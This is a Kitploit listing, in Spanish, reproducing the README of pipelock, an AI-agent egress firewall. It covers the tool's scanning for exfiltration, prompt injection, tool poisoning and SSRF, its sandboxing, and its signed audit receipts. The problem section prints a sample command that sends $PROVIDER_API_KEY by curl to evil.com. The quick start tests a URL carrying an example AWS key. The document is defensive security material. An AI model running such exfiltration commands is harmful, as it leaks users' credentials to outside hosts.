Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
pipelock — Firewall de agente de IA de código abierto que escanea tráfico HTTP, MCP, A2A y WebSocket en busca de exfiltración, SSRF e inyección de prompts, emitiendo recibos de acción firmados verificables para auditoría. | Kitploit
Herramientas/GitHubGitHub/luckypipewrench/pipelock
Escáneres de VulnerabilidadesEvasión de IDS/IPSExfiltración de DatosSeguridad WebPruebas de PenetraciónSeguridad en la NubeInteligencia de AmenazasSeguridad de Cadena de SuministroRespuesta a IncidentesSeguridad de APIsSeguridad de IA
79291hace 14h 3mRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
GitHub
luckypipewrench/pipelock

pipelock

Firewall de agente de IA de código abierto que escanea tráfico HTTP, MCP, A2A y WebSocket en busca de exfiltración, SSRF e inyección de prompts, emitiendo recibos de acción firmados verificables para auditoría.

Ver RepositorioSitio web

Pipelock

Pipelock

Firewall de agente de IA de código abierto para Control de Egreso Verificable.

CI Security Go 1.25+ Release

OpenSSF Scorecard OpenSSF Best Practices codecov pipelock self-scanned

Core Apache 2.0 Enterprise ELv2 CNCF Landscape: Security & Compliance Discord

Pipelock bloqueando un intento de exfiltración de secretos en vivo desde un agente de IA

Pipelock se sitúa entre los agentes de IA y la red. Inspecciona el tráfico HTTP, WebSocket, MCP y A2A mediado, además del contenido de los túneles CONNECT cuando la interceptación TLS está activada, para detectar exfiltración de secretos, inyección de prompts, SSRF, envenenamiento de herramientas y cadenas de llamadas a herramientas riesgosas. El CONNECT simple sin interceptación se escanea a nivel de nombre de host y URL.

Pipelock emite action receipts firmados por el mediador sobre decisiones de límite conscientes del contenido, de modo que un revisor pueda verificar lo que Pipelock decidió fuera del runtime del agente. El corpus público agent-egress-bench ejercita las detecciones. Más información: Firewall de IA de código abierto.

Funciona con: Claude Code · OpenAI Codex · Cline · OpenCode · Zed · Cursor · VS Code · JetBrains · OpenAI Agents SDK · Google ADK · AutoGen · CrewAI · LangGraph

Problema · Verificar · Inicio Rápido · Acción · Capturas · Características · Arquitectura · Docs · Playground · Blog · Preguntar a Dosu

Pruébalo en tu navegador en el playground en vivo. Si Pipelock se lo merece, dale una estrella al repositorio para que otras personas lo encuentren.


El Problema

Tu agente de IA tiene $PROVIDER_API_KEY en su entorno, además de acceso a la shell. Una sola solicitud puede filtrarlo:```bash curl "https://evil.com/steal?key=$PROVIDER_API_KEY" # game over, unless pipelock is watching

root@kitploit:~
Cada acción de máquina que realiza tu agente debería cruzar un límite entre tus secretos e internet abierto. Pipelock se convierte en ese límite cuando el agente se enruta a través de su proxy, envoltorio MCP, sandbox, modelo de contención de host o topología de despliegue en clúster. Escanea el tráfico de salida y entrada mediado, bloquea o marca ataques según el modo, y registra evidencia firmada de la decisión.

---

## Verifícalo Tú Mismo

La mayoría de las herramientas de seguridad de agentes te piden que confíes en su panel de control. Pipelock te entrega un recibo firmado y te permite verificarlo tú mismo, sin conexión, con una clave que tú posees. Sin cuenta ni servidor.

La demo integrada lanza escenarios de ataque reales, los bloquea y escribe recibos firmados junto con la clave pública en el disco sin configuración y sin red:```bash
pipelock demo --receipts-dir ./out                                   # runs attack scenarios, writes 7 signed receipts + signer.pub
pipelock verify-receipt "$(ls ./out/*.json | head -1)" --key ./out/signer.pub  # check a signature yourself (each receipt is <action-id>.json)
Informe de pruebas de Pipelock: la tarjeta de puntuación (Auténtico, Sin alteraciones, Anclado, Integridad, cada uno con su límite honesto) sobre una línea de tiempo de recibos firmados de decisiones mediadas registradas, veredictos y enlaces hash

La tarjeta de puntuación califica cada afirmación por separado e indica lo que no prueba: si ocurrió algo fuera del límite que Pipelock media. Debajo, la línea de tiempo de recibos enumera las decisiones mediadas registradas con sus veredictos y enlaces hash. Un recibo que es honesto acerca de sus propios límites supera una marca de verificación verde que los oculta.

El visor de pruebas es gratuito y no necesita licencia:```bash pipelock evidence serve --receipt-dir ./out # read-only HTML report for one recorded session pipelock evidence view --receipt-dir ./out # static offline report, no server

root@kitploit:~
Dos notas de honestidad, expresadas desde el principio. La demostración firma con una clave efímera que imprime para la ejecución, lo que prueba que los recibos son autoconsistentes en lugar de estar vinculados a una identidad nombrada. El patio de juegos público de Pipelock es una ruta separada que verifica contra una clave que Pipelock publica. Y el operador que ejecuta Pipelock posee la clave de firma, por lo que un recibo prueba lo que el límite decidió y que el titular de la clave lo firmó, no que el operador sea honesto. `pipelock anchor receipts` registra puntos de control de la cadena de recibos en un backend local o en un registro de transparencia de Rekor para una auditoría posterior, y la verificación independiente del operador contra ese ancla aún se está demostrando de extremo a extremo.

El argumento completo de por qué la prueba supera a las promesas está en [demostración sobre atestación](https://github.com/luckypipewrench/pipelock/blob/HEAD/docs/security/demonstration-over-attestation.md).

---

## Inicio rápido```bash
# Install from source (Go 1.25+)
go install github.com/luckyPipewrench/pipelock/cmd/pipelock@latest

# Set up local agent integrations and generate a config
pipelock init

# Test the scanner
pipelock check --url "https://evil.com/?k=AKIAIOSFODNN7EXAMPLE"  # blocked: AWS Access ID
pipelock check --url "https://docs.python.org/3/"                # allowed
Otros métodos de instalación```bash # Download a binary # See https://github.com/luckyPipewrench/pipelock/releases

Docker

docker pull ghcr.io/luckypipewrench/pipelock:latest

Homebrew on macOS

brew install luckyPipewrench/tap/pipelock

root@kitploit:~
</details>

<details>
<summary>Verificar la integridad de la publicación</summary>```bash
gh attestation verify pipelock_3.2.0_linux_amd64.tar.gz --owner luckyPipewrench
gh attestation verify oci://ghcr.io/luckypipewrench/pipelock:v3.2.0 --owner luckyPipewrench

Los flujos de trabajo de lanzamiento publican procedencia SLSA, SBOM CycloneDX, sumas de verificación e imágenes de contenedor firmadas. Las compilaciones desde el código fuente con go install producen un binario solo para la comunidad; los artefactos de lanzamiento precompilados incluyen código de nivel de pago que se activa con una clave de licencia válida.


Véalo en Acción

El panel de operador Pro/Empresarial (pipelock dashboard serve) es una consola de solo lectura sobre evidencia firmada. Admite autenticación mediante token, OIDC o mTLS; permisos RBAC acotados; vistas de metadatos censurados; elevación a vista sin procesar; registros del ciclo de vida de exenciones; copia de seguridad y restauración; certificados de cobertura; y vistas de flota. Está presente en compilaciones etiquetadas como empresariales y en artefactos de lanzamiento con la característica de licencia requerida.

El visor de evidencia gratuito de una sola sesión que se muestra arriba es independiente. No necesita licencia y no tiene enumeración entre agentes.

Página de resumen del panel de operador de Pipelock con actividad por agente, presupuestos, cobertura de evidencia, estado de confianza y estado de la flota. Haga clic para ver el video explicativo de 80 segundos.
La página de resumen. Haga clic para ver el video explicativo del panel de 80 segundos.
Galería del panel
Vista de Evidencia del panel de Pipelock con tarjeta de puntuación de recibo y línea de tiempo de decisiones
Vista de Agentes del panel de Pipelock con resúmenes de evidencia por agente
Vista de Presupuestos del panel de Pipelock con presión de presupuesto por agente
Vista de Flota del panel de Pipelock con tiempo de ejecución de seguidor y estado aplicado
Vista de Banco de Trabajo del panel de Pipelock para revisión de acciones de Conductor firmadas
Vista de Incidentes del panel de Pipelock con correlación de decisiones y divergencia de repetición
Informes y monitoreo gratuitos

pipelock report --input events.jsonl genera informes HTML, JSON o en paquete firmado con clasificación de riesgo, línea de tiempo, categorías de eventos y un apéndice de evidencia. La ruta gratuita de Prometheus y Grafana monitorea una instancia de Pipelock y es distinta del plano de control de flota de Enterprise Conductor.

Informe de Egreso de Agente de Pipelock que muestra clasificación de riesgo, línea de tiempo, hallazgos por categoría y apéndice de evidencia
Monitor de flota de Pipelock en Grafana que muestra tráfico, eventos de seguridad y métricas de WebSocket para una sola instancia

Lo Que Detecta

Medido contra un punto de referencia público y reproducible

agent-egress-bench ejecuta un corpus de ataques de exfiltración de agentes e inyección de indicaciones contra Pipelock, o contra cualquier otra herramienta. Los números provienen de una ejecución que cualquiera puede repetir, no de una afirmación.

Vea los resultados en vivo · Pruébelo usted mismo

Pipelock se ejecuta en tres modos:

Para agentes que ejecutan modelos sin censura o ablacionados, el ajuste preestablecido hostile-model superpone defensas sobre el modo estricto: umbrales de entropía agresivos, bloqueo general de herramientas de red, vinculación de sesión, detección de exfiltración entre solicitudes y un interruptor de apagado preconfigurado. pipelock audit recomienda este ajuste preestablecido cuando detecta cadenas de herramientas de eliminación de barreras conocidas a través de señales de dependencias.

Evaluación honesta: El modo estricto bloquea el HTTP saliente que atraviesa Pipelock excepto los dominios de API en la lista permitida, por lo que no hay canal de exfiltración a través del proxy en sí. El modo equilibrado eleva el listón de "un comando curl" a "ataque sofisticado preplanificado". El modo auditoría le brinda visibilidad que no tiene hoy. Con el sandbox habilitado (pipelock sandbox) o la topología de contención de host/clúster aplicada, Pipelock agrega un límite de SO o de implementación sobre la inspección de contenido. El egreso directo aún debe ser bloqueado por ese límite para herramientas no cooperativas que ignoran la configuración del proxy.

Comparación

Matriz de referencia: docs/comparison.md

Centro de comparación canónico: Comparación de seguridad en tiempo de ejecución de IA

Cobertura OWASP Agentic Top 10

Lo Que Hace

Pipelock es un proxy de egreso de IA y un control de seguridad MCP. Se sitúa en línea entre su agente de IA y la red, escanea el tráfico saliente y entrante, y emite recibos firmados junto con metadatos de mediación para la atestación fuera del tiempo de ejecución del agente. La evaluación de la identidad de carga de trabajo AARP/SVID está hoy del lado del verificador: el proxy y los tiempos de ejecución MCP no consumen evidencia SVID en decisiones de permitir/denegar en vivo ni vinculan la identidad del actor del recibo a partir de un X.509-SVID.

Detección y Escaneo

  • Pipeline de escáner de URL ordenado: comprobaciones de longitud y análisis de URL, validación de esquema, detección de CRLF y path traversal, política de listas permitidas y bloqueadas, pisos inmutables de SSRF de IP literal y DLP básico, DLP configurado, análisis de entropía de ruta y subdominio, protección contra SSRF de DNS y rebinding, límites de velocidad por dominio, presupuestos de datos y comprobaciones de contexto finales. El DLP se ejecuta antes de la resolución DNS, por lo que los secretos se detectan antes de que una consulta DNS salga del proxy. Consulte docs/bypass-resistance.md.
  • DLP: 65 patrones integrados para claves API, tokens, credenciales, claves de criptomonedas, secretos de entorno e identificadores financieros con validación de suma de verificación. La detección de frases semilla BIP-39 utiliza búsqueda en diccionario, ventanas deslizantes y validación de suma de verificación SHA-256.
  • Escaneo de respuestas: 32 patrones integrados de inyección de indicaciones y envenenamiento de estado/control, más normalización de 6 pasos para caracteres de ancho cero, homoglifos, leetspeak, espacios en blanco opcionales, plegado de vocales, base64 y hexadecimal. Las acciones son block, strip, warn o ask.
  • SSE en streaming: las respuestas text/event-stream de las puertas de enlace LLM y el flujo MCP HTTP/SSE se procesan token por token con DLP por evento y entre eventos rodantes y escaneo de inyección. Una detección termina el flujo en modo fallo-cerrado. Consulte la guía de streaming SSE.
  • Escaneo del cuerpo de la solicitud: los encabezados y los cuerpos se escanean antes de que salgan de la ruta protegida a través de JSON, datos de formulario, texto sin formato, solicitudes de proxy inverso, tráfico CONNECT interceptado por TLS y tramas de cliente WebSocket salientes.

Seguridad MCP

Pipelock envuelve servidores MCP con escaneo bidireccional:```bash

Wrap a local MCP server over stdio

pipelock mcp proxy --config pipelock.yaml -- npx -y @modelcontextprotocol/server-filesystem /tmp

Bridge a stdio client to a remote Streamable HTTP server

pipelock mcp proxy --upstream http://localhost:8080/mcp

Run the HTTP proxy and an MCP HTTP listener together

pipelock run --config pipelock.yaml --mcp-listen 127.0.0.1:8889 --mcp-upstream http://localhost:3000/mcp

root@kitploit:~
- **Escaneo de entrada:** las solicitudes del cliente MCP se verifican en busca de fugas DLP e inyección en argumentos de herramientas.
- **Escaneo de respuesta:** las respuestas del servidor se escanean antes de que el agente las vea.
- **Envenenamiento de herramientas:** las descripciones de `tools/list` se verifican en busca de instrucciones ocultas y cambios de "rug-pull" durante la sesión.
- **Política de herramientas:** 17 reglas integradas bloquean eliminaciones destructivas de archivos, acceso a credenciales, shells inversas, mecanismos de persistencia, ejecución de comandos codificados y llamadas a herramientas de alto riesgo relacionadas antes de la ejecución.
- **Cadenas de llamadas a herramientas:** 10 patrones de categoría-eje integrados detectan cadenas de reconocimiento, robo de credenciales, preparación de datos, persistencia, exfiltración y callback con tolerancia de brecha configurable.
- **Inspección A2A:** el tráfico del protocolo Agente-a-Agente de Google se inspecciona en las rutas directas y MCP; Pipelock no es un proxy A2A independiente.
- **Listeners HTTP MCP autenticados (v3.2.0):** los listeners MCP que no son de loopback fallan en modo cerrado por defecto y requieren `--mcp-auth-token-file`, o un `--mcp-allow-unauthenticated` explícito para despliegues aislados por política de red. Los listeners de loopback sin token rechazan autoridades de host de rebote DNS y puerto incorrecto, y eliminan las credenciales del listener de los encabezados.

### Contención

La contención de procesos sin privilegios utiliza primitivas nativas del SO. Linux usa Landlock, seccomp y espacios de nombres de red. macOS usa perfiles `sandbox-exec`. En contenedores, `--best-effort` mantiene Landlock y seccomp cuando la creación de espacios de nombres está restringida, mientras que el escaneo de red utiliza enrutamiento basado en proxy.```bash
pipelock sandbox --config pipelock.yaml -- python agent.py
pipelock sandbox --best-effort -- python agent.py
pipelock mcp proxy --sandbox --config pipelock.yaml -- npx server

La contención del host va más allá en Linux:```bash pipelock contain install pipelock contain verify pipelock contain run -- claude-code

root@kitploit:~
`pipelock contain install / run / verify / rollback / add-tool / grant-workspace / revoke-workspace / ca-refresh` gestiona un modelo de operador / proxy / agente de 3 UID con enrutamiento de coincidencia de propietario de nftables, configuración de servicios systemd, comandos envoltorio, ACLs de espacios de trabajo, actualización de CA y evidencia de postura. Consulte [`docs/contain-cli.md`](https://github.com/luckypipewrench/pipelock/blob/HEAD/docs/contain-cli.md).

### Evidencia y Recibos

- **Grabador de vuelo:** registro de evidencia JSONL encadenado por hash con puntos de control firmados con Ed25519 y redacción DLP. `pipelock init` provisiona un directorio de grabador y clave de firma para instalaciones estándar, mientras que el grabador permanece inactivo hasta que existan un directorio y una clave. Consulte [Grabador de vuelo](https://github.com/luckypipewrench/pipelock/blob/HEAD/docs/guides/flight-recorder.md).
- **Recibos de acción:** registros firmados emitidos para acciones mediadas, que contienen veredicto, hash de política, transporte y capa de escáner. Los bloques producen recibos; la aplicación de recibos de ruta permitida requiere `flight_recorder.require_receipts`. Verifique con `pipelock verify-receipt --key <signer.pub>`. Las ejecuciones no fijadas son solo estructurales y salen con código distinto de cero a menos que se pase `--allow-unpinned`.
- **Envolvente de mediación:** metadatos de banda lateral RFC 8941 en solicitudes HTTP reenviadas y `_meta` de MCP, con tipo de acción, veredicto, identidad del actor, hash de política, contexto de contaminación e ID de correlación de recibo. Consulte [guía de federación](https://github.com/luckypipewrench/pipelock/blob/HEAD/docs/guides/federation.md).
- **Conformidad de recibos:** cuatro implementaciones independientes de verificador en varios lenguajes (Go, TypeScript, Rust y Python) se ejecutan contra un [corpus de conformidad](https://github.com/luckypipewrench/pipelock/blob/HEAD/sdk/conformance/) compartido, incluyendo entradas malformadas y falsificables como claves duplicadas, desbordamiento de enteros y sustitutos no emparejados. Una superficie wasm de navegador reutiliza la implementación del verificador Go. La evaluación AARP/SVID sigue siendo un perfil de verificador fuera de línea, no una aplicación de identidad en tiempo de ejecución.
- **Anclajes:** `pipelock anchor receipts` registra puntos de control de la cadena de recibos en un backend local o Rekor. El anclaje en Rekor es material de prueba para auditorías posteriores; la verificación en Rekor requiere claves de registro fijadas y la ruta de independencia del operador de extremo a extremo aún está en proceso de demostración.
- **Cápsula de postura:** `pipelock posture emit` y `pipelock posture verify` producen y verifican una instantánea firmada de la postura de aplicación de un despliegue, con una puerta de CI y un modelo de puntuación, para que un revisor pueda confirmar que el límite estaba configurado como afirma.

### Flota y Empresa

- **Panel de control del operador:** `pipelock dashboard serve` es una consola de solo lectura sobre evidencia firmada. Pro desbloquea las vistas General, Evidencia, Exenciones, Agentes, Presupuestos y Confianza y Claves; Enterprise añade las vistas Flota, Banco de trabajo e Incidentes. Consulte [`docs/cli/dashboard.md`](https://github.com/luckypipewrench/pipelock/blob/HEAD/docs/cli/dashboard.md).
- **Visor de evidencia gratuito:** `pipelock evidence serve` y `pipelock evidence view` representan una sesión de grabador seleccionada sin licencia ni enumeración de agentes cruzados. `pipelock evidence verify-cert` verifica certificados de cobertura emitidos por Pro fuera de línea.
- **Conductor:** Plano de control de flota empresarial para distribución de paquetes de políticas firmados, sumidero de evidencia firmada (`pipelock fleet-sink`), inscripción, eliminación remota, reversión, ejecución en seco, reproducción de decisiones y verificación previa de desviación en tiempo de ejecución/estado aplicado a través de mTLS/SPIFFE. Los seguidores aplican localmente; el modo de política obsoleta predeterminado activa una fuente de denegación independiente después de su ventana de gracia, mientras que la anulación documentada `continue_last_known_good` debilita esa postura. Conductor no guarda secretos de agentes. Consulte la [guía de Conductor](https://github.com/luckypipewrench/pipelock/blob/HEAD/docs/guides/conductor.md).
- **Retención legal:** `pipelock dashboard legal-hold add/list/release` gestiona las retenciones de preservación como metadatos de cumplimiento mantenidos fuera de la autoridad HTTP del panel, por lo que un panel comprometido puede leer las retenciones pero nunca falsificarlas ni eliminarlas.
- **Línea base de comportamiento:** perfilado y bloqueo para el comportamiento de herramientas MCP con `pipelock baseline list/show/ratify/forget` para aprobación del operador y reaprendizaje. Consulte [`docs/cli/baseline.md`](https://github.com/luckypipewrench/pipelock/blob/HEAD/docs/cli/baseline.md).

### Operatividad

- **Interruptor de apagado:** seis fuentes de activación independientes: archivo de configuración, API remota, SIGUSR1, archivo centinela, eliminación remota de Conductor y detección de paquete obsoleto. Cualquier fuente activa bloquea el tráfico, con exenciones de punto final e IP en el controlador.
- **API de escaneo:** escaneo programático para veredictos de `url`, `dlp`, `prompt_injection` y `tool_call` con autenticación de token de portador, limitación de velocidad por token, hallazgos estructurados y métricas de Prometheus. Consulte [docs/scan-api.md](https://github.com/luckypipewrench/pipelock/blob/HEAD/docs/scan-api.md).
- **Centinela del sistema de archivos:** monitorea los directorios de trabajo del agente en busca de secretos escritos en disco y atribuye las escrituras al linaje de subprocesos MCP en Linux. Consulte [docs/guides/filesystem-sentinel.md](https://github.com/luckypipewrench/pipelock/blob/HEAD/docs/guides/filesystem-sentinel.md).
- **Emisión de eventos:** reenvía eventos de auditoría a SIEMs, receptores webhook, syslog, CEF, OTLP y salidas de métricas sin bloquear la ruta activa del proxy. Consulte [docs/guides/siem-integration.md](https://github.com/luckypipewrench/pipelock/blob/HEAD/docs/guides/siem-integration.md).
- **Evaluación de seguridad:** `pipelock assess init`, `pipelock assess run` y `pipelock assess finalize` orquestan simulación de ataques, puntuación de configuración, verificación de instalación y descubrimiento MCP en un paquete de evidencia reproducible. Las exposiciones críticas, como servidores MCP desprotegidos, limitan la calificación independientemente de la puntuación numérica. El resumen gratuito muestra su calificación, puntuaciones de sección y principales hallazgos; una licencia desbloquea el informe completo con hallazgos específicos del servidor, comandos de remediación y evidencia firmada con Ed25519.

<details>
<summary>Más características</summary>

| Característica | Qué Hace |
|---------|-------------|
| **Informes de auditoría** | `pipelock report --input events.jsonl` genera informes HTML/JSON/paquete con calificación de riesgo, cronología y apéndice de evidencia. Firma Ed25519 con `--sign`. ([Informe de muestra](https://github.com/luckypipewrench/pipelock/blob/HEAD/examples/sample-report.html)) |
| **Diagnóstico** | `pipelock diagnose` ejecuta 7 comprobaciones locales para verificar su configuración de extremo a extremo sin red. |
| **Doctor de aplicación** (v2.5) | `pipelock doctor` informa el estado configurado vs. aplicable para proxy, intercepción TLS, escaneo del cuerpo de la solicitud, Browser Shield, envoltura MCP, integridad binaria MCP, procedencia de herramientas, file_sentry, Sentry y señales de límite de despliegue. |
| **Bloqueo de inyección en cuerpo de solicitud** (v2.5) | Los hallazgos de inyección de solicitud en el cuerpo y DLP crítico bloquean destinos no proveedores en modo de aplicación a través de transportes forward, reverse, TLS-intercept y WebSocket, con encabezados de razón de bloqueo para diagnóstico visible para el operador. |
| **Política de solicitud** (v2.6) | Rieles de denegación/advertencia predeterminados sobre operaciones de API salientes: coincidencia de ruta más predicados de operación GraphQL, recurre en envolventes JSON `$batch`, falla cerrado en cuerpos no analizables u opacos, y se ejecuta antes de la puerta del contrato. Consulte la [guía de política de solicitud](https://github.com/luckypipewrench/pipelock/blob/HEAD/docs/guides/request-policy.md). |
| **Intercepción TLS** | MITM de túnel CONNECT opcional: descifra, escanea cuerpos/encabezados/respuestas, vuelve a cifrar. `pipelock tls init` genera una CA, luego `pipelock tls install-ca` imprime los pasos de instalación del almacén de confianza de la plataforma. |
| **Pistas de bloqueo** | `explain_blocks: true` opcional añade sugerencias de corrección a las respuestas bloqueadas. |
| **Auditoría de proyecto** | `pipelock audit ./project` escanea en busca de riesgos de seguridad y genera una configuración personalizada. |
| **Puntuación de configuración** (v2.6) | `pipelock audit score --config pipelock.yaml` evalúa la postura de seguridad en 23 categorías con un presupuesto de 170 puntos y una calificación con letra. |
| **Integridad de archivos** | Los manifiestos SHA256 detectan archivos modificados, añadidos o eliminados en el espacio de trabajo. |
| **Protección Git** | `git diff \| pipelock git scan-diff` detecta secretos antes del commit. |
| **Firma Ed25519** | Gestión de claves, firma de archivos y verificación de firmas para confianza multiagente. |
| **Perfilado de sesiones** | Análisis de comportamiento por sesión para ráfagas de dominio y picos de volumen. |
| **Aplicación adaptativa** | Puntuación de amenaza por sesión con escalada de advertencia a bloqueo, temporizadores de desescalada y detección de ráfagas de dominio. |
| **CLI de operador adaptativo** (v2.5) | `pipelock adaptive status / flush / whoami` expone el estado adaptativo en tiempo de ejecución a través de la API de administración autenticada. Consulte [`docs/cli/adaptive.md`](https://github.com/luckypipewrench/pipelock/blob/HEAD/docs/cli/adaptive.md). |
| **Supresión de hallazgos** | Silenciar falsos positivos conocidos a través de reglas de configuración o comentarios inline `pipelock:ignore`. |
| **Soporte multiagente** | Identificación de agente a través del encabezado `X-Pipelock-Agent` para filtrado por agente. |
| **Monitoreo de flota** | Métricas de Prometheus por instancia más [panel de Grafana](https://github.com/luckypipewrench/pipelock/blob/HEAD/configs/grafana-dashboard.json) listo para importar. Monitoreo gratuito de instancia única, distinto de Conductor. |
| **Panel de operador** (v3.1, Pro/Enterprise) | `pipelock dashboard serve` proporciona vistas de solo lectura de General, Evidencia, Exenciones, Agentes, Presupuestos, Confianza y Claves, Flota, Banco de trabajo e Incidentes con autenticación por token, OIDC o mTLS, RBAC acotado, elevación de vista sin procesar, copia de seguridad/restauración, registros de ciclo de vida de exenciones y certificados de cobertura. Consulte [`docs/cli/dashboard.md`](https://github.com/luckypipewrench/pipelock/blob/HEAD/docs/cli/dashboard.md). |
| **Visor de evidencia gratuito** (v3.1) | `pipelock evidence serve` sirve una sesión de grabador seleccionada como informe HTML de solo lectura sin licencia y sin enumeración de agentes cruzados. `pipelock evidence verify-cert` verifica certificados de cobertura emitidos por Pro fuera de línea. |
| **Conductor: plano de control de flota** (v2.7, Enterprise) | Distribución de paquetes de políticas firmados, sumidero de auditoría de evidencia firmada (`pipelock fleet-sink`), inscripción, eliminación remota, reversión de políticas, ejecución en seco, reproducción de decisiones y verificación previa de desviación en tiempo de ejecución/estado aplicado a través de mTLS/SPIFFE. Controlado por la característica de licencia `fleet`; el comportamiento de política obsoleta es explícito y predetermina a denegación estricta. Consulte la [guía de Conductor](https://github.com/luckypipewrench/pipelock/blob/HEAD/docs/guides/conductor.md). |
| **Escaneo A2A** | Detección de envenenamiento de tarjeta de agente, monitoreo de desviación de tarjeta y prevención de contrabando de sesiones para el protocolo Agente a Agente de Google en rutas forward/MCP. |
| **Línea base de comportamiento** | Perfilado y bloqueo para el comportamiento de herramientas MCP con `pipelock baseline list/show/ratify/forget` para aprobación del operador y reaprendizaje. Consulte [`docs/cli/baseline.md`](https://github.com/luckypipewrench/pipelock/blob/HEAD/docs/cli/baseline.md). |
| **Denegación de billetera** | Presupuestos MCP por agente para total de llamadas a herramientas, reintentos de la misma herramienta, detección de bucles/ciclos y duración de tiempo real. |
| **Escalada de contaminación** | Escalada de políticas basada en exposición a través de límites MCP y de tarea hasta que se restablezca la confianza. |
| **Envolvente de mediación** | Metadatos de banda lateral RFC 8941 en solicitudes HTTP reenviadas y `_meta` de MCP, con verificación entrante, protección de reproducción, formato de actor SPIFFE y un directorio de claves de firma RFC 9421. Consulte [guía de federación](https://github.com/luckypipewrench/pipelock/blob/HEAD/docs/guides/federation.md). |
| **Conformidad de recibos** | Suite de verificación de recibos entre implementaciones (`sdk/conformance/`) a través de implementaciones independientes en Go, TypeScript, Rust y Python, más una superficie wasm de navegador respaldada por Go. `EvidenceReceipt v2` usa canonicación RFC 8785/JCS. La evaluación AARP/SVID sigue siendo del lado del verificador fuera de línea. |
| **Aprender y bloquear** (v2.4) | Contratos de comportamiento por agente: observar tráfico, compilar un contrato candidato firmado, reproducir observaciones capturadas en sombra, ratificar por regla, promover el manifiesto activo firmado y aplicar en vivo en transportes que usan URL más llamadas a herramientas MCP. Consulte [guía de aprender y bloquear](https://github.com/luckypipewrench/pipelock/blob/HEAD/docs/guides/learn-and-lock.md). |
| **Encabezado de razón de bloqueo** (v2.4) | `X-Pipelock-Block-Reason` en rutas de bloqueo compatibles con HTTP, con el mismo vocabulario de motivo en metadatos de error JSON-RPC de MCP. Consulte [encabezado de razón de bloqueo](https://github.com/luckypipewrench/pipelock/blob/HEAD/docs/guides/block-reason-header.md). |
| **Perro guardián de detección de cuña** (v2.4) | `health_watchdog` devuelve `/health` 503 cuando un latido de subsistema se vuelve obsoleto. Consulte [guía de punto final de salud](https://github.com/luckypipewrench/pipelock/blob/HEAD/docs/guides/health.md). |
| **Forma de complemento de proveedor de redacción** (v2.4) | Analizadores de redacción de primera parte para APIs de chat de Anthropic, OpenAI y Gemini, con una forma de complemento de proveedor para analizadores de terceros. |
| **Esquema de paquete de auditoría v0 + verificadores** (v2.5) | Esquema canónico de paquete de auditoría de primera parte con implementaciones de verificador en Go, TypeScript y Rust, más CLI independiente [`pipelock-verifier`](https://github.com/luckypipewrench/pipelock/blob/HEAD/cmd/pipelock-verifier/). El esquema reside en [`sdk/audit-packet/`](https://github.com/luckypipewrench/pipelock/blob/HEAD/sdk/audit-packet/); los paquetes de verificador residen en [`sdk/verifiers/`](https://github.com/luckypipewrench/pipelock/blob/HEAD/sdk/verifiers/). |
| **Ciclo de vida de contención de host** (v2.5) | `pipelock contain install / run / verify / rollback / add-tool / grant-workspace / revoke-workspace / ca-refresh` gestiona el modelo de contención de 3 UID. Consulte [`docs/contain-cli.md`](https://github.com/luckypipewrench/pipelock/blob/HEAD/docs/contain-cli.md). |
| **Manifiestos de integridad MCP** (v2.5) | `pipelock mcp integrity manifest generate / verify / sign / verify-signature` fija binarios/scripts de servidor MCP por hash y puede requerir una firma de manifiesto de confianza antes del lanzamiento del subproceso. Consulte [`docs/cli/mcp-integrity.md`](https://github.com/luckypipewrench/pipelock/blob/HEAD/docs/cli/mcp-integrity.md). |
| **Contrato de lanzador MCP de Kubernetes** (v2.5) | `pipelock init sidecar --mcp-upstream` emite configuración de oyente acompañante, puerto de servicio, anotaciones de carga de trabajo, permiso de NetworkPolicy, `PIPELOCK_MCP_PROXY_URL` y `PIPELOCK_MCP_CONFIG` montado. Consulte [`docs/cli/init-sidecar.md`](https://github.com/luckypipewrench/pipelock/blob/HEAD/docs/cli/init-sidecar.md). |
| **Modo estricto de federación** (v2.5) | La verificación entrante de envolvente de mediación requiere actores en formato SPIFFE por defecto, se aplican lápidas de contrato, y `pipelock envelope trust add/list/remove/verify` gestiona la confianza local. Consulte [guía de federación](https://github.com/luckypipewrench/pipelock/blob/HEAD/docs/guides/federation.md). |
| **Política de medios** | Elimina metadatos esteganográficos de JPEG/PNG, rechaza audio/video por defecto, endurece contenido activo SVG y aplica límites de tamaño de imagen. Consulte [Política de medios](https://github.com/luckypipewrench/pipelock/blob/HEAD/docs/guides/media-policy.md). |
| **Mapeos de cumplimiento** | OWASP MCP Top 10, OWASP Agentic Top 15, OWASP LLM Top 10, NIST 800-53, EU AI Act, y mapeos de adquisición/auditoría. |

</details>

---

## Gratuito, Pro y Enterprise

Toda la detección, aplicación, contención y evidencia de agente único es gratuita para siempre bajo Apache 2.0. Los niveles pagados añaden coordinación multiagente (Pro) y gobierno de flota más cumplimiento (Enterprise).

| Capacidad | Gratuito | Pro | Enterprise |
|---|:--:|:--:|:--:|
| Escaneo y detección (tubería de URL ordenada, DLP, inyección, SSRF, SSE en streaming, redacción, protección de direcciones) | Sí | Sí | Sí |
| Escaneo MCP y A2A (entrada, respuesta, política de herramientas, cadena de herramientas, envenenamiento, integridad, oyentes autenticados) | Sí | Sí | Sí |
| Contención, sandbox, `contain` de host, interruptor de apagado de 6 fuentes | Sí | Sí | Sí |
| Recibos de acción, grabador de vuelo, anclajes, visor de evidencia gratuito, `verify-cert`, verificador independiente | Sí | Sí | Sí |
| Tokens canarios, skill-scan, `explain`, Prometheus y Grafana de instancia única | Sí | Sí | Sí |
| Perfiles por agente: identidad, presupuestos, aislamiento de configuración y escáner, sandbox por agente | No | Sí | Sí |
| Enrutamiento por agente por CIDR de origen y selector de red | No | Sí | Sí |
| Panel de operador: General, Evidencia, Exenciones, Agentes, Presupuestos, Confianza y Claves | No | Sí | Sí |
| Certificados de cobertura por agente | No | Sí | Sí |
| Retención legal y metadatos de cumplimiento | No | Sí | Sí |
| Plano de control de flota Conductor, sumidero de auditoría `fleet-sink`, eliminación remota, reversión, reproducción de decisiones, verificación previa de desviación | No | No | Sí |
